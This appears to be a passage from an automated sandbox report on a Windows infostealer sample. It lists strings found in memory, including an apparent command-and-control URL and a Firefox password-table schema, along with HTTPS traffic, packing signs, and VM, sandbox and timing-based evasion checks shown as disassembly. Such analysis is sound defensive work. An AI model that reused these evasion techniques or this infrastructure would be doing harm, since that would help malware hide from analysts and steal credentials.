              Source: zhQFKte2vX.exe, 00000000.00000003.1549254762.00000000011C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/apiV
              Source: zhQFKte2vX.exe, 00000000.00000003.1634896746.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634336776.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668244427.0000000001269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm
              Source: zhQFKte2vX.exe, 00000000.00000003.1603096089.000000000126C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
              Source: zhQFKte2vX.exe, 00000000.00000003.1602552757.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: zhQFKte2vX.exe, 00000000.00000003.1602552757.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: zhQFKte2vX.exe, 00000000.00000003.1634896746.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634336776.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668244427.0000000001269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
              Source: zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: zhQFKte2vX.exe, 00000000.00000003.1603096089.000000000126C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: zhQFKte2vX.exe, 00000000.00000003.1602552757.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
              Source: zhQFKte2vX.exe, 00000000.00000003.1602552757.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
              Source: zhQFKte2vX.exe, 00000000.00000003.1602552757.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
              Source: zhQFKte2vX.exe, 00000000.00000003.1602552757.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: zhQFKte2vX.exe, 00000000.00000003.1602552757.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49713 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: zhQFKte2vX.exeStatic PE information: section name:
              Source: zhQFKte2vX.exeStatic PE information: section name: .idata
              Source: zhQFKte2vX.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_011DF19F0_3_011DF19F
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_011EABDD0_3_011EABDD
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_011E6B680_3_011E6B68
              Source: zhQFKte2vX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: zhQFKte2vX.exeStatic PE information: Section: ZLIB complexity 0.9972642872431506
              Source: zhQFKte2vX.exeStatic PE information: Section: zajbtexj ZLIB complexity 0.9940281540247679
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@3/1
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: zhQFKte2vX.exe, 00000000.00000003.1578369696.0000000005B46000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1552093109.0000000005B2D000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551823930.0000000005B4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: zhQFKte2vX.exeReversingLabs: Detection: 65%
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile read: C:\Users\user\Desktop\zhQFKte2vX.exeJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: zhQFKte2vX.exeStatic file information: File size 1819648 > 1048576
              Source: zhQFKte2vX.exeStatic PE information: Raw size of zajbtexj is bigger than: 0x100000 < 0x193c00

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeUnpacked PE file: 0.2.zhQFKte2vX.exe.4e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zajbtexj:EW;kwcryctq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zajbtexj:EW;kwcryctq:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: zhQFKte2vX.exeStatic PE information: real checksum: 0x1c7648 should be: 0x1c5917
              Source: zhQFKte2vX.exeStatic PE information: section name:
              Source: zhQFKte2vX.exeStatic PE information: section name: .idata
              Source: zhQFKte2vX.exeStatic PE information: section name:
              Source: zhQFKte2vX.exeStatic PE information: section name: zajbtexj
              Source: zhQFKte2vX.exeStatic PE information: section name: kwcryctq
              Source: zhQFKte2vX.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_0124B928 push eax; ret 0_3_0124B929
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_0124B928 push eax; ret 0_3_0124B929
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_0124812A pushad ; ret 0_3_0124812D
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_0124812A pushad ; ret 0_3_0124812D
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_011DFA20 pushad ; retf 0_3_011DFB15
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_0123CF38 push esp; iretd 0_3_0123CF39
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_0123CF38 push esp; iretd 0_3_0123CF39
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_0123AC4F push eax; iretd 0_3_0123AC56
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_0123AC4F push eax; iretd 0_3_0123AC56
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_0123CF38 push esp; iretd 0_3_0123CF39
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_0123CF38 push esp; iretd 0_3_0123CF39
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_0123AC4F push eax; iretd 0_3_0123AC56
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_0123AC4F push eax; iretd 0_3_0123AC56
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_011EABDD pushad ; ret 0_3_011EAF11
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_011EA154 push edi; retf 0_3_011EA1DD
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_0124B928 push eax; ret 0_3_0124B929
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_0124B928 push eax; ret 0_3_0124B929
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_0124812A pushad ; ret 0_3_0124812D
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_0124812A pushad ; ret 0_3_0124812D
              Source: zhQFKte2vX.exeStatic PE information: section name: entropy: 7.97194323302097
              Source: zhQFKte2vX.exeStatic PE information: section name: zajbtexj entropy: 7.953476453200085

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6A87AD second address: 6A87B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6A87B5 second address: 6A87F2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCD7C4F0D96h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FCD7C4F0DA8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FCD7C4F0DA5h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 69EDC9 second address: 69EDE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FCD7D2AFB06h 0x0000000a ja 00007FCD7D2AFB06h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007FCD7D2AFB06h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 69EDE2 second address: 69EDE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 69EDE8 second address: 69EE17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB15h 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FCD7D2AFB06h 0x0000000f jmp 00007FCD7D2AFB10h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6A7912 second address: 6A791A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6A7A8F second address: 6A7A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6A7A97 second address: 6A7AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6A7AA3 second address: 6A7AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6A7AA7 second address: 6A7AAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6A7AAB second address: 6A7AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6A7C10 second address: 6A7C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6A7C16 second address: 6A7C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6A7C1B second address: 6A7C25 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCD7C4F0D9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6A7C25 second address: 6A7C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FCD7D2AFB0Dh 0x0000000c pushad 0x0000000d je 00007FCD7D2AFB06h 0x00000013 jmp 00007FCD7D2AFB18h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6AB0FA second address: 6AB100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6AB13A second address: 6AB170 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCD7D2AFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007FCD7D2AFB10h 0x00000011 nop 0x00000012 mov di, 7CA4h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 jc 00007FCD7D2AFB08h 0x0000001f mov ch, 4Dh 0x00000021 pop edx 0x00000022 push 341F6052h 0x00000027 pushad 0x00000028 push esi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6AB170 second address: 6AB210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FCD7C4F0DA7h 0x0000000a popad 0x0000000b xor dword ptr [esp], 341F60D2h 0x00000012 call 00007FCD7C4F0DA3h 0x00000017 jmp 00007FCD7C4F0D9Bh 0x0000001c pop edi 0x0000001d push 00000003h 0x0000001f mov di, bx 0x00000022 push 00000000h 0x00000024 mov ecx, dword ptr [ebp+122D308Eh] 0x0000002a push 00000003h 0x0000002c mov ecx, dword ptr [ebp+122D36A8h] 0x00000032 push eax 0x00000033 mov dword ptr [ebp+122D2576h], edx 0x00000039 pop ecx 0x0000003a call 00007FCD7C4F0D99h 0x0000003f jnc 00007FCD7C4F0D9Eh 0x00000045 push eax 0x00000046 jmp 00007FCD7C4F0DA8h 0x0000004b mov eax, dword ptr [esp+04h] 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FCD7C4F0D9Ah 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6AB301 second address: 6AB306 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6AB306 second address: 6AB34E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7C4F0DA7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007FCD7C4F0DA4h 0x00000012 push 00000000h 0x00000014 mov cx, 6E00h 0x00000018 push A65E4DAEh 0x0000001d jo 00007FCD7C4F0DA4h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6AB34E second address: 6AB352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6AB352 second address: 6AB3BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 59A1B2D2h 0x0000000d and ecx, dword ptr [ebp+122D3458h] 0x00000013 push 00000003h 0x00000015 xor edx, dword ptr [ebp+122D36B8h] 0x0000001b push 00000000h 0x0000001d or ecx, 4AE23A80h 0x00000023 push 00000003h 0x00000025 mov esi, dword ptr [ebp+122D30D2h] 0x0000002b jg 00007FCD7C4F0D98h 0x00000031 push 4982EE6Bh 0x00000036 jmp 00007FCD7C4F0DA1h 0x0000003b add dword ptr [esp], 767D1195h 0x00000042 mov esi, edx 0x00000044 lea ebx, dword ptr [ebp+1244701Dh] 0x0000004a sub dword ptr [ebp+122D336Dh], edx 0x00000050 push eax 0x00000051 jp 00007FCD7C4F0DA4h 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6AB3BB second address: 6AB3BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6AB44E second address: 6AB46F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007FCD7C4F0D96h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov si, dx 0x00000010 push 00000000h 0x00000012 add esi, 0D67A5F1h 0x00000018 push DD08C90Ch 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6AB46F second address: 6AB51D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 add dword ptr [esp], 22F73774h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FCD7D2AFB08h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 jnc 00007FCD7D2AFB08h 0x0000002f and edx, 2396D460h 0x00000035 push 00000003h 0x00000037 or dword ptr [ebp+12445959h], edx 0x0000003d push 00000000h 0x0000003f mov ch, bh 0x00000041 push 00000003h 0x00000043 push ABFA2BDCh 0x00000048 jng 00007FCD7D2AFB18h 0x0000004e jmp 00007FCD7D2AFB12h 0x00000053 xor dword ptr [esp], 6BFA2BDCh 0x0000005a jmp 00007FCD7D2AFB15h 0x0000005f lea ebx, dword ptr [ebp+12447028h] 0x00000065 jng 00007FCD7D2AFB06h 0x0000006b push eax 0x0000006c mov edx, ebx 0x0000006e pop edx 0x0000006f xchg eax, ebx 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FCD7D2AFB15h 0x00000077 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC7FA second address: 6CC81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FCD7C4F0D96h 0x0000000a popad 0x0000000b push esi 0x0000000c jmp 00007FCD7C4F0DA5h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC81D second address: 6CC822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC822 second address: 6CC839 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FCD7C4F0D9Dh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
